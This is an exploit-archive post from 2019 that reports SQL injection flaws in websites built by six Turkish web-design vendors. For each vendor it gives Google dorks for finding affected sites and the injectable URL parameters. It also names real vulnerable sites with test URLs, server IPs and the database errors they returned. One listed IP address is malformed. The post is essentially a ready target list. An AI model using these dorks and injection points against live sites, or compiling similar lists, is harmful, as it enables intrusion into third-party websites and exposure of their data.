facebook facebook twitter rss

DevSoft * BTMArgeBilişim * Algoritma İzmir * M.Ceylan MPlusNet * Webİcerik * Verisay * Web Designs SQL Injection

Author: KingSkrupellos , Published: 01-02-2019
####################################################################

# Exploit Title : DevSoft * BTMArgeBilişim * Algoritma İzmir * M.Ceylan MPlusNet * Webİcerik * Verisay * Web Designs SQL Injection
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 25/01/2019
# Vendor Homepages of 6 Products :
1) devsoft.com.tr
2) btmbilisim.com ~ btmarge.com
3) algoritma.com.tr
4) mplusnet.com
5) webicerik.com
6) verisay.com
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Vulnerability Type : CWE-89 [ Improper Neutralization of
Special Elements used in an SQL Command ('SQL Injection') ]

####################################################################

# There are 6 vendors that their products suffer from remote SQL Injection Vulnerabilities.
***************************************************************************

1) Web Yazılım Devsoft Turkish SQL Injection Vulnerability => [ Vendor ] => devsoft.com.tr

2) BTMArgeBilişim SQL Injection Vulnerability => [ Vendor ] => btmbilisim.com ~ btmarge.com

3) Algoritma İnternet Reklam Ajansı İzmir SQL Injection Vulnerability => [ Vendor ] => algoritma.com.tr

4) M.Ceylan MPlusNet Alanya SQL Injection Vulnerability => [ Vendor ] => mplusnet.com

5) Webİcerik SQL Injection Vulnerability => [ Vendor ] => webicerik.com

6) Verisay Web Tasarım SQL Injection Vulnerability => [ Vendor ] => verisay.com

####################################################################

# Google Dorks for Vulnerable Different Products ;
********************************************

1) intext:''Web Yazılım: Devsoft''

2) intext:''Tüm hakları saklıdır. BTM ARGE.''

3) intext:''www.algoritma.com.tr"

4) intext:''Powered By M.Ceylan'' site:tr

5) intext:Webİcerik Kurumsal

6) intext:Verisay Web Tasarım

####################################################################

1) Web Yazılım Devsoft SQL Injection Vulnerability
********************************************

# Google Dork :
****************
intext:''Web Yazılım: Devsoft''

# SQL Injection Exploit :
**********************
/urunler.php?id=[SQL Injection]

/page.php?id=[SQL Injection]

/haber.php?id=[SQL Injection]

# Example Vulnerable Site :
************************
[+] adabroker.com.tr/urunler.php?id=90%27

Note : (94.73.151.155) => There are 338 domains hosted on this server.

Note : (159.69.91.216) => There are 44 domains hosted on this server.

# SQL Database Error :
*********************
HATA : You have an error in your SQL syntax; check the manual that

corresponds to your MySQL server version for the right syntax to use near '\'' at line 1

####################################################################

2) BTMArgeBilişim SQL Injection Vulnerability
****************************************

# Google Dork :
****************
intext:''Tüm hakları saklıdır. BTM ARGE.''

# SQL Injection Exploit :
**********************
/urun_detay.php?ID=[SQL Injection]

# Example Vulnerable Site :
************************
[+] habibmetal.com/urun_detay.php?ID=1'

Note : (213.128.66.82) => There are 543 domains hosted on this server.

Note : (35.243.133.12) => There are 2 domains hosted on this server.

# SQL Database Error :
**********************
Notice: Undefined index: GBilgi in /home/habibmetal/public_html/incfi/inc_footer.php on line 12

####################################################################

3) Algoritma İnternet Reklam Ajansı İzmir SQL Injection Vulnerability
**********************************************************

# Google Dork :
****************
intext:''www.algoritma.com.tr"

# SQL Injection Exploit :
**********************
/urun.php?id=[SQL Injection]

/urunler.php?id=[SQL Injection]

# Example Vulnerable Site :
************************
[+] ozgordal.com.tr/urun.php?id=15%27

Note : (94.73.146.96) => There are 220 domains hosted on this server.

Note : (93.187.206.206) => There are 693 domains hosted on this server.

# SQL Database Error :
**********************
select * from yenilikler where id=15'

select * from kategoriler where id=6'

####################################################################

4) M.Ceylan MPlusNet Alanya SQL Injection Vulnerability
**************************************************

# Google Dork :
****************
intext:''Powered By M.Ceylan'' site:tr

# SQL Injection Exploit :
**********************
/match.php?id_match=[SQL Injection]

/lig/consult/istatistik.php?equipe=[SQL Injection]

# Example Vulnerable Site :
************************
[+] alanyaspor.org.tr/match.php?id_match=871%27

Note : (31.169.73.251) => There are 1 domains hosted on this server.

Note : (31.169.73.242) => There are 58 domains hosted on this server.

# SQL Database Error :
**********************
Warning: mysql_fetch_array() expects parameter 1 to be

resource, boolean given in /home/alanyaspor/public_html/match.php on line 62

####################################################################

5) Webİcerik SQL Injection Vulnerability
************************************
# Google Dork :
****************
intext:Webİcerik Kurumsal

# SQL Injection Exploit :
**********************
/index.php?page=mod_video_goster&videoID=[SQL Injection]

/ENG/index.php?page=icerikgoster&menuID=[SQL Injection]

# Example Vulnerable Site :
************************
tcma.org.tr/index.php?page=mod_video_goster&videoID=12%27

Note : (77.92.99.319) => 1 Domain.

Note : (77.92.99.31) => There are 13 domains hosted on this server.

# SQL Database Error :
**********************
Warning: mysql_fetch_assoc(): supplied argument is not a valid

MySQL result resource in /var/www/vhosts/tcma.org.tr

/tcma.org.tr/ENG/lib/emit_icerik.php on line 323

####################################################################

6) Verisay Web Tasarım SQL Injection Vulnerability
*********************************************
# Google Dork :
****************
intext:Verisay Web Tasarım

# SQL Injection Exploit :
**********************
/urunler/urun_detay.php?id=[SQL Injection]

# Example Vulnerable Site :
************************
[+] irena.com.tr/urunler/urun_detay.php?id=1465%27

Note : (89.19.29.4) => There are 130 domains hosted on this server.

Note : (52.19.74.107) => There are 10 domains hosted on this server.

# SQL Database Error :
**********************
SELECT DEGER FROM gnl_ayarlar WHERE ANAHTAR='SITEBASLIK'

Warning: mysql_fetch_row() expects parameter 1 to be resource, boolean

given in D:\vhosts\irena.com.tr\http\libs\lib-data.php on line 15

SELECT d.ID, d.SIPARIS_ID, d.URUN_ID, d.MIKTAR, sto_kod AS KOD,
sto_birim2_katsayi AS QUANTITY, sto_birim2_boy * sto_birim2_en *
sto_birim2_yukseklik / 1000000000 AS VOLUME, sto_birim2_agirlik AS
GROSSWEIGHT, sfiyat_fiyati AS UNIT_PRICE FROM sip_siparis_detay
d LEFT JOIN sip_siparis s ON s.ID = d.SIPARIS_ID LEFT JOIN urun_urun
u ON u.ID = d.URUN_ID WHERE DURUM = 0 AND s.MUSTERI_ID = ''

####################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

####################################################################

Like us on Facebook :